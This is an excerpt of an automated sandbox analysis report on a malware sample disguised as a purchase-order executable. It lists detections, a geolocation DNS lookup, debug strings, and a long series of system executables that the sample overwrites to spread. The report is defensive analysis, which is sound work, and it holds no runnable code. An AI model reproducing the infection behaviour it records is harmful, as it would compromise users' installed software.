                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeJoe Sandbox ML: detected

                          Location Tracking

                          barindex
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_01088286 CryptStringToBinaryA,CryptStringToBinaryA,GetTokenInformation,GetTokenInformation,GetLastError,OpenProcessToken,CloseHandle,GetSidSubAuthorityCount,34_2_01088286
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.0
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: GoogleUpdateCore_unsigned.pdb source: GoogleUpdateCore.exe.11.dr
                          Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe0.11.dr
                          Source: Binary string: _.pdb source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2045260394.0000000004723000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: crashreporter.pdb source: alg.exe, 0000000B.00000003.2627135802.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
                          Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: uws\dll\mscorlib.pdbe source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb source: Aut2exe.exe.11.dr
                          Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
                          Source: Binary string: Acrobat_SL.pdb source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
                          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: alg.exe, 0000000B.00000003.1814990672.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2262552254.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, 64BitMAPIBroker.exe.11.dr
                          Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe0.11.dr
                          Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: GoogleUpdateCore.exe.11.dr
                          Source: Binary string: firefox.pdb source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000B.00000003.2241398314.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: firefox.pdbP source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
                          Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
                          Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
                          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: chrome_proxy.exe.11.dr
                          Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
                          Source: Binary string: mscorlib.pdb source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005EBC000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.11.dr
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
                          Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.11.dr
                          Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
                          Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp

                          Spreading

                          barindex
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
